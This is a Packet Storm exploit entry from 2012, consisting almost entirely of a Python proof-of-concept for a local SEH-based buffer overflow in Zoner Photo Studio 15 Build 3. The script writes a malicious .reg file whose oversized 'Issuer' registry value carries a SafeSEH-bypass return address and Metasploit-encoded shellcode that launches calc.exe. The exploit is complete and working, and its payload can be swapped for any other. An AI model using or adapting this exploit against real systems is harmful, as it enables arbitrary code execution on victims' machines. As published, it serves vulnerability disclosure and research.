Zoner Photo Studio 15 Build 3 Registry Value Parsing

2012-11-12T00:00:00
ID PACKETSTORM:118029
Type packetstorm
Reporter Julien Ahrens
Modified 2012-11-12T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
  
# Exploit Title: Zoner Photo Studio v15 Build 3 (Zps.exe) Registry Value Parsing Local Buffer Overflow  
# Version: 15 Build 3, Build 2  
# Date: 2012-11-09  
# Author: Julien Ahrens  
# Homepage: http://www.inshell.net  
# Software Link: http://www.zoner.com  
# Tested on: Windows XP SP3 Professional German  
# Notes: -  
# Howto: Import Reg -> Start App  
  
from struct import pack  
  
file="poc.reg"  
  
junk1="\xCC" * 2136  
nseh="\xeb\x06\x90\x90"  
eip=pack('<L',0x0C7D8F13) # JMP DWORD PTR SS:[EBP-18] - Access: (PAGE_READWRITE) [SafeSEH Bypass]  
nops="\x90" * 10  
junk2="\xCC" * 1000  
  
# windows/exec CMD=calc.exe  
# Encoder: x86/shikata_ga_nai  
# powered by Metasploit  
# msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d\x22\x93'  
  
shellcode = ("\xbd\x55\xd9\x54\xcd\xdb\xdc\xd9\x74\x24\xf4\x5a\x33\xc9" +  
"\xb1\x33\x31\x6a\x12\x03\x6a\x12\x83\x97\xdd\xb6\x38\xeb" +  
"\x36\xbf\xc3\x13\xc7\xa0\x4a\xf6\xf6\xf2\x29\x73\xaa\xc2" +  
"\x3a\xd1\x47\xa8\x6f\xc1\xdc\xdc\xa7\xe6\x55\x6a\x9e\xc9" +  
"\x66\x5a\x1e\x85\xa5\xfc\xe2\xd7\xf9\xde\xdb\x18\x0c\x1e" +  
"\x1b\x44\xff\x72\xf4\x03\x52\x63\x71\x51\x6f\x82\x55\xde" +  
"\xcf\xfc\xd0\x20\xbb\xb6\xdb\x70\x14\xcc\x94\x68\x1e\x8a" +  
"\x04\x89\xf3\xc8\x79\xc0\x78\x3a\x09\xd3\xa8\x72\xf2\xe2" +  
"\x94\xd9\xcd\xcb\x18\x23\x09\xeb\xc2\x56\x61\x08\x7e\x61" +  
"\xb2\x73\xa4\xe4\x27\xd3\x2f\x5e\x8c\xe2\xfc\x39\x47\xe8" +  
"\x49\x4d\x0f\xec\x4c\x82\x3b\x08\xc4\x25\xec\x99\x9e\x01" +  
"\x28\xc2\x45\x2b\x69\xae\x28\x54\x69\x16\x94\xf0\xe1\xb4" +  
"\xc1\x83\xab\xd2\x14\x01\xd6\x9b\x17\x19\xd9\x8b\x7f\x28" +  
"\x52\x44\x07\xb5\xb1\x21\xf7\xff\x98\x03\x90\x59\x49\x16" +  
"\xfd\x59\xa7\x54\xf8\xd9\x42\x24\xff\xc2\x26\x21\xbb\x44" +  
"\xda\x5b\xd4\x20\xdc\xc8\xd5\x60\xbf\x8f\x45\xe8\x6e\x2a" +  
"\xee\x8b\x6e")  
  
poc="Windows Registry Editor Version 5.00\n\n"  
poc=poc + "[HKEY_CURRENT_USER\Software\ZONER\Zoner Photo Studio 15\Preferences\Certificate]\n"  
poc=poc + "\"Issuer\"=\"" + junk1 + nseh + eip + nops + shellcode + junk2 + "\""  
  
try:  
print "[*] Creating exploit file...\n";  
writeFile = open (file, "w")  
writeFile.write( poc )  
writeFile.close()  
print "[*] File successfully created!";  
except:  
print "[!] Error while creating file!";  
  
`